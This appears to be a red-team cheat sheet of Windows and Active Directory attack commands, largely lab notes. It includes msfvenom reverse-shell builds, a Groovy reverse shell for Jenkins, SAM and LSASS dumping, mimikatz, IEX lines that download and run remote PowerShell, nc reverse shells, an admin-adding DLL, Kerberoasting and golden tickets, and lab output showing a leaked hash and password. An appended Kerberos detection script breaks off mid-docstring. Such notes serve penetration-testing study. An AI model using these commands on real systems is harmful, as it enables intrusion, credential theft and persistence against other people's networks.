# RED TEAM AD

# SIMPLE WINDOWS HACKING

- Perimeter access
- Exfiltrate NTLM hashes
- hashcat
- Privilege escalation:
  - unquoted path
  - dll hijack
  - simple persistence
- Bypasses
  - AMSI BYPASS
  - Disable Execute Policy
  - Disable AV
- SAM
- Active Directory:
  - AD: AD enumeration
  - AD: LSASS.EXE
  - AD: pass the hash
  - AD: pass the ticket
  - AD: DCSync

___

https://www.offsec.com/metasploit-unleashed/windows-post-gather-modules/

Step 3: Use the shown module by following the command "use post/multi/manage/shell_to_meterpreter" or by simply typing "use 0". Either command will work.

___

Executable with Windows cmd:

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f exe > shell-cmd.exe
```

Windows DLL with Windows cmd:

```bash
msfvenom -p windows/shell/reverse_tcp LHOST=YourIP LPORT=YourPort -f dll > shell-cmd.dll
```

post/windows/manage/migrate

This module migrates a Meterpreter session from one process to another. It can migrate to a given process PID, or spawn a new process and migrate to that newly spawned process.

Startup folders (simple persistence):

```bash
dir /b "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 2>nul
dir /b "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 2>nul
dir /b "%programdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
dir /b "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" 2>nul
Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup"
Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
```

https://github.com/ParrotSec/mimikatz

- https://raw.githubusercontent.com/saisathvik1/OSCP-Cheatsheet/main/README.md

## File Transfers

- Downloading on Windows

```bash
powershell -command Invoke-WebRequest -Uri http://<LHOST>:<LPORT>/<FILE> -Outfile C:\temp\<FILE>
iwr -uri http://lhost/file -Outfile file
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
copy \\kali\share\file .
```

- Downloading on Linux

```bash
wget http://lhost/file
curl http://<LHOST>/<FILE> > <OUTPUT_FILE>
```

### Windows to Kali

```bash
kali> impacket-smbserver -smb2support <sharename> .
win> copy file \\KaliIP\sharename
```

## Port Scanning

```bash
#use -Pn option if you're getting nothing in scan
nmap -sC -sV <IP> -v                                  #Basic scan
nmap -T4 -A -p- <IP> -v                               #complete scan
sudo nmap -sV -p 443 --script "vuln" 192.168.50.124   #running vuln category scripts
#NSE
updatedb
locate .nse | grep <name>
sudo nmap --script="name" <IP>   #here we can specify other options like specific ports...etc
Test-NetConnection -Port <port> <IP>   #powershell utility
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP", $_)) "TCP port $_ is open"} 2>$null   #automating port scan of first 1024 ports in powershell
```

## FTP enumeration

```bash
ftp <IP>   #login if you have relevant creds or, based on the nmap scan, find out whether anonymous login is allowed, then login with Anonymous:password
put <file>   #uploading file
get <file>   #downloading file
#NSE
locate .nse | grep ftp
nmap -p21 --script=<name> <IP>
#bruteforce
hydra -L users.txt -P passwords.txt <IP> ftp   #'-L' for usernames list, '-l' for username and vice versa
#check for vulnerabilities associated with the version identified.
```

## SSH enumeration

```bash
#Login
ssh uname@IP   #enter password in the prompt
#id_rsa or id_ecdsa file
chmod 600 id_rsa/id_ecdsa
ssh uname@IP -i id_rsa/id_ecdsa   #if it still asks for password, crack them using John
#cracking id_rsa or id_ecdsa
ssh2john id_ecdsa(or)id_rsa > hash
john --wordlist=/home/sathvik/Wordlists/rockyou.txt hash
#bruteforce
hydra -l uname -P passwords.txt <IP> ssh   #'-L' for usernames list, '-l' for username and vice versa
#check for vulnerabilities associated with the version identified.
```

## SMB enumeration

```bash
sudo nbtscan -r 192.168.50.0/24   #IP or range can be provided
#NSE scripts can be used
locate .nse | grep smb
nmap -p445 --script="name" $IP
#In windows we can view like this
net view \\<computername/IP> /all
#crackmapexec
crackmapexec smb <IP/range>
crackmapexec smb 192.168.1.100 -u username -p password
crackmapexec smb 192.168.1.100 -u username -p password --shares            #lists available shares
crackmapexec smb 192.168.1.100 -u username -p password --users             #lists users
crackmapexec smb 192.168.1.100 -u username -p password --all               #all information
crackmapexec smb 192.168.1.100 -u username -p password --port 445 --shares #specific port (--port, not -p, which is the password)
crackmapexec smb 192.168.1.100 -u username -p password -d mydomain --shares #specific domain
#In place of username and password, we can include usernames.txt and passwords.txt for password-spraying or bruteforcing.
# Smbclient
smbclient -L //IP   #or try with 4 /'s
smbclient //server/share
smbclient //server/share -U <username>
smbclient //server/share -U domain/username
#SMBmap
smbmap -H <target_ip>
smbmap -H <target_ip> -u <username> -p <password>
smbmap -H <target_ip> -u <username> -p <password> -d <domain>
smbmap -H <target_ip> -u <username> -p <password> -r <share_name>
#Within SMB session
put <file>   #to upload file
get <file>   #to download file
```

- Downloading shares made easy: if the folder consists of several files, they will all be downloaded with this.

```bash
mask ""
recurse ON
prompt OFF
mget *
```

## HTTP/S enumeration

- View the source code and identify any hidden content. If some image looks suspicious, download it and try to find hidden data in it.
- Identify the version or CMS and check for active exploits. This can be done using Nmap and Wappalyzer.
- Check /robots.txt.
- Look for the hostname and add the relevant one to the `/etc/hosts` file.
- Directory and file discovery: obtain any hidden files which may contain juicy information.

```bash
dirbuster
gobuster dir -u http://example.com -w /path/to/wordlist.txt
python3 dirsearch.py -u http://example.com -w /path/to/wordlist.txt
```

- Vulnerability scanning using nikto: `nikto -h <url>`
- SSL certificate inspection; this may reveal information like subdomains, usernames, etc.
- Default credentials: identify the CMS or service and check for default credentials and test them out.
- Bruteforce

```bash
hydra -L users.txt -P password.txt <IP or domain> http-{post/get}-form "/path:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https; post or get can be obtained from Burpsuite. Also do capture the response for detailed info.
#Bruteforce can also be done by Burpsuite but it's slow, prefer Hydra!
```

- If `cgi-bin` is present then do further fuzzing and obtain files like .sh or .pl.
- Check if other services like FTP/SMB or any others which have upload privileges are getting reflected on the web.
- API: fuzz further and it can reveal some sensitive information.

```bash
#identifying endpoints using gobuster
gobuster dir -u http://192.168.50.16:5002 -w /usr/share/wordlists/dirb/big.txt -p pattern   #pattern can be like {GOBUSTER}/v1; here v1 is just an example, it can be anything
#obtaining info using curl
curl -i http://192.168.50.16:5002/users/v1
```

- If there is any input field, check for **Remote Code Execution** or **SQL Injection**.
- Check the URL, whether we can leverage **Local or Remote File Inclusion**.
- Also check if there's any file upload utility (also obtain the location where it's getting reflected).

### Wordpress

```bash
# basic usage
wpscan --url "target" --verbose
# enumerate vulnerable plugins, users, vulnerable themes, timthumbs
wpscan --url "target" --enumerate vp,u,vt,tt --follow-redirection --verbose --log target.log
# Add Wpscan API to get the details of vulnerabilities.
```

### Drupal

```bash
droopescan scan drupal -u http://site
```

### Joomla

```bash
droopescan scan joomla --url http://site
sudo python3 joomla-brute.py -u http://site/ -w passwords.txt -usr username   #https://github.com/ajnik/joomla-bruteforce
```

## DNS enumeration

```bash
host www.megacorpone.com
host -t mx megacorpone.com
host -t txt megacorpone.com
for ip in $(seq 200 254); do host 51.222.169.$ip; done | grep -v "not found"   #bash bruteforcer to find domain name
dnsrecon -d megacorpone.com -t std                  #standard recon
dnsrecon -d megacorpone.com -D ~/list.txt -t brt    #bruteforce, hence we provided list
dnsenum megacorpone.com
nslookup mail.megacorptwo.com
nslookup -type=TXT info.megacorptwo.com 192.168.50.151   #we're querying with a specific IP
```

## SMTP enumeration

```bash
nc -nv <IP> 25   #Version Detection
smtp-user-enum -M VRFY -U username.txt -t <IP>   # -M means mode, it can be RCPT, VRFY, EXPN
#Sending email with valid credentials, the below is an example for a phishing mail attack
sudo swaks -t user1@test.com -t user2@test.com --from user3@test.com --server <mailserver-IP> --body @body.txt --header "Test" --suppress-data -ap
```

## LDAP Enumeration

```bash
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
#CN name describes the info we're collecting
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
#windapsearch.py
#for computers
python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --computers
#for groups
python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --groups
#for users
python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --da
#for privileged users
python3 windapsearch.py --dc-ip <IP address> -u <username> -p <password> --privileged-users
```

## NFS Enumeration

```bash
nmap -sV --script=nfs-showmount <IP>
showmount -e <IP>
```

## SNMP Enumeration

```bash
snmpcheck -t <IP> -c public
snmpwalk -c public -v1 -t 10 <IP>
snmpenum -t <IP>
```

## RPC Enumeration

```bash
rpcclient -U=user $DCIP
rpcclient -U="" $DCIP   #Anonymous login
##Commands within rpcclient
srvinfo
enumdomusers              #users
enumpriv                  #like "whoami /priv"
queryuser <user>          #detailed user info
getuserdompwinfo <RID>    #password policy, get user-RID from previous command
lookupnames <user>        #SID of specified user
createdomuser <username>  #Creating a user
deletedomuser <username>
enumdomains
enumdomgroups
querygroup <group-RID>    #get rid from previous command
querydispinfo             #description of all users
netshareenum              #Share enumeration, this only comes up if the current user we're logged in as has permissions
netshareenumall
lsaenumsid                #SID of all users
```

### Groovy reverse-shell

- For Jenkins (script console). `host` and `port` are the listener; the original one-liner is split across lines for readability.

```groovy
String host = "localhost";
int port = 8044;
String cmd = "cmd.exe";
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
    // pump process stdout/stderr to the socket and socket input to the process
    while (pi.available() > 0) so.write(pi.read());
    while (pe.available() > 0) so.write(pe.read());
    while (si.available() > 0) po.write(si.read());
    so.flush();
    po.flush();
    Thread.sleep(50);
    try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy();
s.close();
```

## DUMP SAM

```
On Windows:
reg save HKLM\sam sam
reg save HKLM\system system

Send both files in a zip to your KALI (attacker machine).

On KALI:
# samdump2 -d SYSTEM SAM
```

![](https://hackmd.io/_uploads/rJZAGmYH3.png)
![](https://hackmd.io/_uploads/HJ_-mLtr3.png)
![](https://hackmd.io/_uploads/HkiX5PKS3.png)

https://www.hackingarticles.in/credential-dumping-sam/

## DUMP LSASS

PowerShell script to take a dump of a process (minidump file):

https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1

![](https://hackmd.io/_uploads/SJh8zMtH2.png)
![](https://hackmd.io/_uploads/HJ1xNzFS3.png)

#### EXTRA:

https://github.com/outflanknl/Dumpert
https://secybr.com/posts/dumping-lsass-without-mimikatz/

## Password-Hash Cracking

*Hash Analyzer*: [https://www.tunnelsup.com/hash-analyzer/](https://www.tunnelsup.com/hash-analyzer/)

### fcrackzip

```bash
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt <FILE>.zip   #Cracking zip files
```

### John

> [https://github.com/openwall/john/tree/bleeding-jumbo/run](https://github.com/openwall/john/tree/bleeding-jumbo/run)

```bash
ssh2john.py id_rsa > hash   #Convert the obtained key to John format (script from the link above)
john hashfile --wordlist=rockyou.txt
```

### Hashcat

> [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)

```bash
#Obtain the hash module number from the link above
hashcat -m <number> hash wordlists.txt --force
```

## mimikatz: lsadump::lsa /patch

```powershell
lsadump::lsa /patch
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"'
```

**Administrador NT hash: fc19a68b44372b3bcf0297e08a28fda8**

![](https://hackmd.io/_uploads/B153FMtS2.png)
![](https://hackmd.io/_uploads/Hkg1cMtS3.png)

```
Authentication Id : 0 ; 18444321 (00000000:01197021)
Session           : CachedInteractive from 1
User Name         : Administrador
Domain            : BLEACH
Logon Server      : PRINCIPAL-BLEACH
Logon Time        : 22/05/2023 18:11:36
SID               : S-1-5-21-3777977817-1859332824-490154379-500
        msv :
         [00000003] Primary
         * Username : Administrador
         * Domain   : BLEACH
         * NTLM     : fc19a68b44372b3bcf0297e08a28fda8
         * SHA1     : a23a9ebee5923c7860e21a1ef6cf053cf6885c00
         * DPAPI    : 380f529916e7310ff45ab4ab0e99c80e
        tspkg :
        wdigest :
         * Username : Administrador
         * Domain   : BLEACH
         * Password : (null)
        kerberos :
         * Username : Administrador
         * Domain   : BLEACH.LOCAL
         * Password : Hack1T995
        ssp : KO
        credman :
```

![](https://hackmd.io/_uploads/B1asHQtrh.png)

https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections
https://redteamrecipe.com/64-Methods-For-Execute-Mimikatz/
https://systemweakness.com/bypass-mimikatz-using-process-injection-technique-6d2a8415fcd6

## Mimikatz

```powershell
privilege::debug
sekurlsa::logonpasswords   #hashes and plaintext passwords
lsadump::sam
lsadump::lsa /patch        #both of these dump the SAM
#OneLiner
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
```

## Ligolo-ng

```bash
#Creating the interface and starting it.
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
#Kali machine - attacker machine
./proxy -laddr <LHOST>:9001 -selfcert
#windows or linux machine - compromised machine
./agent -connect <LHOST>:9001 -ignore-cert
#In the Ligolo-ng console
session     #select host
ifconfig    #note down the internal network's subnet
start       #after adding the relevant subnet to the ligolo interface
#Adding subnet to ligolo interface - Kali linux
sudo ip r add <subnet> dev ligolo
```

#### BLIND PASS THE HASH WITH PS.

```
PS C:\Users\jquerito\Downloads\impacket> IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1');
PS C:\Users\jquerito\Downloads\impacket> Invoke-WMIExec -target PRINCIPAL-BLEACH -hash fc19a68b44372b3bcf0297e08a28fda8 -username Administrador -command "ping 10.0.9.7"
[+] Command executed with process ID 5900 on PRINCIPAL-BLEACH

ON KALI:
sudo tcpdump -nni eth0 icmp
```

![](https://hackmd.io/_uploads/rkSl4HFB3.png)
![](https://hackmd.io/_uploads/H1-d7HFSn.png)

## Token Impersonation

- Command to check: `whoami /priv`

```bash
#Printspoofer
PrintSpoofer.exe -i -c powershell.exe
PrintSpoofer.exe -c "nc.exe <lhost> <lport> -e cmd"
#RoguePotato
RoguePotato.exe -r <AttackerIP> -e "shell.exe" -l 9999
#GodPotato
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "shell.exe"
#JuicyPotatoNG
JuicyPotatoNG.exe -t * -p "shell.exe" -a
#SharpEfsPotato
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"   #writes whoami output to the w.log file
```

### TO GET A REVERSE SHELL

```bash
evil-winrm -i 10.0.9.5 -u Administrador -H fc19a68b44372b3bcf0297e08a28fda8
```

![](https://hackmd.io/_uploads/HkmERBKS2.png)
![](https://hackmd.io/_uploads/B1atdrYB3.png)

# RUBEUS

![](https://hackmd.io/_uploads/SJAvF8KS3.png)
![](https://hackmd.io/_uploads/BkytYLYSn.png)
![](https://hackmd.io/_uploads/SJ-oKIKSn.png)

#### BUT...

![](https://hackmd.io/_uploads/Skh55gtSn.png)

https://github.com/byt3bl33d3r/pth-toolkit LOL

![](https://hackmd.io/_uploads/ryhjLHKBn.png)
![](https://hackmd.io/_uploads/rJiQXLYB3.png)

IMPERSONATION:

![](https://hackmd.io/_uploads/Sk7mfOFSh.png)

```
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
```

KERBEROAST:::

![](https://hackmd.io/_uploads/S1dd9DFS2.png)
![](https://hackmd.io/_uploads/BkxD1OtBn.png)
![](https://hackmd.io/_uploads/r11NVOtB3.png)

________________________

# ARE YOU WINNING SON?

### LocalPotato (THM)

The local privilege escalation technique known as "LocalPotato" relies on a vulnerability in Windows operating systems that allows a user with limited privileges to elevate to administrator level. The specific vulnerability that LocalPotato exploits is known as "SeImpersonatePrivilege". It lets a normal user obtain the "Impersonate" privilege in Windows, a high-level privilege that allows the user to perform privileged actions, such as running commands with elevated privileges.

![](https://hackmd.io/_uploads/rJwnOn0S3.png)
![](https://hackmd.io/_uploads/HyRSO60B3.png)
![](https://hackmd.io/_uploads/Hk34K6AB3.png)
![](https://hackmd.io/_uploads/ryY_t3RH3.png)
![](https://hackmd.io/_uploads/rJFEVp0B2.png)
![](https://hackmd.io/_uploads/ryx1X6RB2.png)

Command-string fragment from the DLL source:

```
c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add
```

```
C:\Users\user\Desktop>move "C:\tools\LPE via StorSvc\RpcClient\x64\Debug\RpcClient.exe" .
        1 file(s) moved.

C:\Users\user\Desktop>move "C:\tools\LPE via StorSvc\SprintCSP\x64\Debug\SprintCSP.dll" .
Overwrite C:\Users\user\Desktop\SprintCSP.dll? (Yes/No/All): Yes
        1 file(s) moved.

C:\Users\user\Desktop>
____
C:\Users\user\Desktop>reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" -v Path

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
    Path    REG_EXPAND_SZ    %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\;C:\Program Files\Amazon\cfn-bootstrap\

C:\Users\user\Desktop>LocalPotato.exe -i SprintCSP.dll -o \Windows\System32\SprintCSP.dll

         LocalPotato (aka CVE-2023-21746)
         by splinter_code & decoder_it

[*] Objref Moniker Display Name = objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGAQAAAAAAAAAKirfTBVWTTryu0ycrVEdmAXwAANASEA3T1a0Mi6U3jSkAEwAHAEwAUAAAAAcAMQAwAC4AMQAwAC4AMQAzADgALgA0ADUAAAAAAAkA//8AAB4A//8AABAA//8AAAoA//8AABYA//8AAB8A//8AAA4A//8AAAAA:
[*] Calling CoGetInstanceFromIStorage with CLSID:{854A20FB-2D44-457D-992F-EF13785D2B51}
[*] Marshalling the IStorage object... IStorageTrigger written: 100 bytes
[*] Received DCOM NTLM type 1 authentication from the privileged client
[*] Connected to the SMB server with ip 127.0.0.1 and port 445
[+] SMB Client Auth Context swapped with SYSTEM
[+] RPC Server Auth Context swapped with the Current User
[*] Received DCOM NTLM type 3 authentication from the privileged client
[+] SMB reflected DCOM authentication succeeded!
[+] SMB Connect Tree: \\127.0.0.1\c$ success
[+] SMB Create Request File: Windows\System32\SprintCSP.dll success
[+] SMB Write Request file: Windows\System32\SprintCSP.dll success
[+] SMB Close File success
[+] SMB Tree Disconnect success
```

![](https://hackmd.io/_uploads/HkRjFTAr2.png)

### kerberoasting

https://ciberseguridad.com/amenzas/ataques-kerberoasting/#%C2%BFQue_son_los_ataques_de_Kerberoasting

Service Principal Names (SPNs) are used to uniquely identify each instance of a Windows service. To allow authentication, Kerberos requires SPNs to be associated with at least one service. Adversaries holding a valid Kerberos ticket-granting ticket (TGT) can request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC). The same attack could be carried out using service tickets captured from network traffic. Cracked hashes can enable Persistence, Privilege Escalation and Lateral Movement through access to Valid Accounts.

Kerberoasting takes advantage of how service accounts use Kerberos authentication with Service Principal Names (SPNs). Kerberoasting lets us crack the passwords of those accounts.

```powershell
Get-NetUser | Where-Object {$_.servicePrincipalName} | fl
get-adobject | Where-Object {$_.serviceprincipalname -ne $null -and $_.distinguishedname -like "*CN=Users*" -and $_.cn -ne "krbtgt"}
# Kerberoast all users in Domain
```

![](https://hackmd.io/_uploads/HyqviRRS3.png)

```powershell
# All Users in OU
.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local
# Specific users
.\Rubeus.exe kerberoast /user:File_SVC
```

### ASREPRoast

ASREPRoast is a technique similar to Kerberoasting that tries to crack, offline, the passwords of service users, but specifically those with the DONT_REQ_PREAUTH attribute, i.e. those for which Kerberos pre-authentication is not required. Of course, enabling this is not recommended, because without pre-authentication an attacker can directly send a bogus authentication request (a KRB_AS_REQ message) without knowing the credentials. The KDC returns an encrypted TGT and the attacker can brute-force it offline. Checking the KDC logs, nothing will be seen except a single TGT request.

https://www.hackplayers.com/2020/11/asreproast-o-as-rep-roasting.html
https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1

```bash
# ASREP check on all domain users (requires valid domain credentials)
# single quotes: in double quotes the shell would expand $krb5asrep as a variable
python2 GetNPUsers.py <Domain>/<User>:<Password> -request -dc-ip <IP> -format <John|Hashcat> | grep '$krb5asrep$'
# ASREP check on a list of domain users (does not require domain credentials)
python2 GetNPUsers.py <Domain> -usersfile <UserList> -dc-ip <IP> -format <John|Hashcat> | grep '$krb5asrep$'

# https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
# Extract from all domain accounts
.\Rubeus.exe asreproast
.\Rubeus.exe asreproast /format:hashcat /outfile:C:\Hashes.txt

# Windows
hashcat64.exe -m 18200 C:\Hashes.txt rockyou.txt
# Linux (AS-REP hashes use the krb5asrep format in John)
john --wordlist rockyou.txt Hashes.txt --format=krb5asrep
hashcat -m 18200 -a 3 Hashes.txt rockyou
```

![](https://hackmd.io/_uploads/r1x7A0AB3.png)
![](https://hackmd.io/_uploads/B1hYdRCS2.png)

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting

![](https://hackmd.io/_uploads/Hy8bz1JU3.png)
![](https://hackmd.io/_uploads/ByhJbyJI3.png)
![](https://hackmd.io/_uploads/r1RVz1JIh.png)

```
PS C:\Users\jquerito\Downloads\mimikatz-master\mimikatz-master\x64> scp.exe .\kiribiris.zip kali@10.0.9.7:/home/kali/Documents/cosas/
kali@10.0.9.7's password:
kiribiris.zip                                  100%   22KB  21.5KB/s   00:00
PS C:\Users\jquerito\Downloads\mimikatz-master\mimikatz-master\x64>
```

```
┌──(kali㉿kali)-[~/Documents/cosas]
└─$ python3 ../kerberoast/tgsrepcrack.py /home/kali/Documents/rockyou.txt kiribiris/3-40a10000-jquerito@mssql_svc\~mssqlserver.BLEACH.local-BLEACH.LOCAL.kirbi
```

USE HASHCAT, IT'S HELLA FASTER!!

```bash
hashcat -m 13100 --force <TGSs_file> <passwords_file>
```

https://www.hackingarticles.in/lateral-movement-over-pass-the-hash/
https://www.hackingarticles.in/lateral-movement-pass-the-ticket-attack/
https://www.hackingarticles.in/lateral-movement-pass-the-ccache/

TOOLS TO TRY::

https://github.com/r4wd3r/Suborner
https://github.com/silverfort-open-source/latma
https://github.com/BeichenDream/GodPotato
https://github.com/Accenture/Spartacus

## PASS THE TICKET

![](https://hackmd.io/_uploads/SJ9BqV_8h.png)

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket
https://www.thehacker.recipes/ad/movement/kerberos/ptt

```
PS> .\mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit
```

```
# lsadump::lsa /patch
Rubeus.exe monitor /interval:1

# EXPORT TICKETS
# Using mimikatz
sekurlsa::tickets /export

# Using Rubeus
## Dump all tickets
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
## List all tickets
.\Rubeus.exe triage
## Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
```

```
root@kali:kerbrute# python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
--> rubeus.exe brute /password:Password@1 /noticket
--> .\Rubeus.exe brute /users:users.txt /passwords:passwords.txt /domain:jurassic.park /outfile:jurassic_passwords.txt
rubeus.exe changepw /targetuser:ignite.local\mufasa /ticket:doIFNDCC...bA== /new:Password@1!!!
```
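The Kerberoasting, AS-REP roasting and Kerberos brute-force commands in the last few sections each leave a distinct footprint in the domain controller's Security log (events 4769, 4768 and 4771 respectively). The script below is an added example, not part of the original notes: it triages constructed event records for those three patterns. Field names follow the Windows Kerberos audit schema; the sample records, account names and thresholds are assumptions.

```python
"""Triage of DC Kerberos audit events for roasting and brute-force patterns.

Added example, not part of the original notes. Event fields follow the Windows
Security log schema for 4768 (TGT request), 4769 (service ticket request) and
4771 (pre-authentication failed); the records, names and thresholds below are
constructed assumptions, not real telemetry.
"""
from collections import defaultdict

RC4_ETYPE = "0x17"                     # RC4-HMAC, the etype Rubeus/Invoke-Kerberoast request
AES256_ETYPE = "0x12"
AUTH_FAILURE_STATUS = {"0x6", "0x18"}  # 0x6 client unknown, 0x18 wrong password

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # ordinary AES service ticket for a machine account
    {"EventID": 4769, "TargetUserName": "alice@BLEACH.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": AES256_ETYPE, "IpAddress": "10.0.9.21", "Status": "0x0"},
    # one principal pulling RC4 tickets for several user SPN accounts (Kerberoast pattern)
    {"EventID": 4769, "TargetUserName": "jquerito@BLEACH.LOCAL", "ServiceName": "mssql_svc",
     "TicketEncryptionType": RC4_ETYPE, "IpAddress": "10.0.9.7", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jquerito@BLEACH.LOCAL", "ServiceName": "http_svc",
     "TicketEncryptionType": RC4_ETYPE, "IpAddress": "10.0.9.7", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "jquerito@BLEACH.LOCAL", "ServiceName": "File_SVC",
     "TicketEncryptionType": RC4_ETYPE, "IpAddress": "10.0.9.7", "Status": "0x0"},
    # TGT issued with no pre-authentication (DONT_REQ_PREAUTH account): AS-REP roastable
    {"EventID": 4768, "TargetUserName": "svc_backup", "ServiceName": "krbtgt",
     "TicketEncryptionType": RC4_ETYPE, "PreAuthType": "0", "IpAddress": "10.0.9.7", "Status": "0x0"},
    # ordinary TGT with pre-authentication
    {"EventID": 4768, "TargetUserName": "alice", "ServiceName": "krbtgt",
     "TicketEncryptionType": AES256_ETYPE, "PreAuthType": "2", "IpAddress": "10.0.9.21", "Status": "0x0"},
    # one source failing against many different accounts (kerbrute / spray pattern)
    {"EventID": 4771, "TargetUserName": "bob", "IpAddress": "10.0.9.7", "Status": "0x18"},
    {"EventID": 4771, "TargetUserName": "carol", "IpAddress": "10.0.9.7", "Status": "0x18"},
    {"EventID": 4768, "TargetUserName": "nosuchuser", "IpAddress": "10.0.9.7", "Status": "0x6"},
    # a single mistyped password from a workstation is not a spray
    {"EventID": 4771, "TargetUserName": "alice", "IpAddress": "10.0.9.21", "Status": "0x18"},
]


def _is_machine_or_krbtgt(service: str) -> bool:
    """Computer accounts end in '$' and krbtgt is the KDC itself; neither is a roasting target."""
    return service.endswith("$") or service.lower() == "krbtgt"


def detect_kerberoast(events, distinct_spn_threshold=3):
    """Flag 4769 events that look like Kerberoasting.

    Two signals: an RC4 service ticket for a user (non-machine) SPN account, and one
    principal requesting tickets for many distinct services. Returns (signal, user, detail).
    """
    findings = []
    spns_by_user = defaultdict(set)
    for ev in events:
        if ev["EventID"] != 4769 or ev.get("Status") != "0x0":
            continue
        user, service = ev["TargetUserName"], ev["ServiceName"]
        if _is_machine_or_krbtgt(service):
            continue
        spns_by_user[user].add(service)
        if ev.get("TicketEncryptionType") == RC4_ETYPE:
            findings.append(("rc4_service_ticket", user, service))
    for user, spns in spns_by_user.items():
        if len(spns) >= distinct_spn_threshold:
            findings.append(("many_spns", user, sorted(spns)))
    return findings


def detect_asrep_roast(events):
    """Flag successful 4768 events issued with no pre-authentication (PreAuthType 0).

    That is the footprint of GetNPUsers / Rubeus asreproast: the account has
    DONT_REQ_PREAUTH set, so the KDC hands out an AS-REP that can be cracked offline.
    """
    return [(ev["TargetUserName"], ev.get("IpAddress")) for ev in events
            if ev["EventID"] == 4768 and ev.get("Status") == "0x0" and ev.get("PreAuthType") == "0"]


def detect_password_spray(events, distinct_account_threshold=3):
    """Group Kerberos authentication failures by source and report sources that
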